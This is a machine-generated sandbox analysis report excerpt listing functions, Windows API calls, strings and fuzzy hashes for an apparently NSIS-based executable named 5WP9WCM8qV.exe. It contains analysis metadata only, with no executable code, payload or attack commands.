Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

Function 004045B4 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,Call), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen, xrefs: 00404704
Call, xrefs: 00404715, 0040471A, 00404725
A, xrefs: 004046D7

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen$Call
API String ID: 2624150263-1985349926
Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

Function 0040686A Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04

Function 00407041 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95

Function 004042B6 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

open, xrefs: 004044C5
N, xrefs: 00404452
-B@, xrefs: 004044C2
Call, xrefs: 00404493

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$Call$N$open
API String ID: 3615053054-1446803726
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

NUL, xrefs: 00405D8D
[Rename], xrefs: 00405E65, 00405E77
%ls=%ls, xrefs: 00405DF1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 004062E9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,"C:\Users\user\Desktop\5WP9WCM8qV.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

Strings

"C:\Users\user\Desktop\5WP9WCM8qV.exe", xrefs: 0040632D
*?|<>/":, xrefs: 0040633B
C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4062474357
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(0008340D,00000064,00083611), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

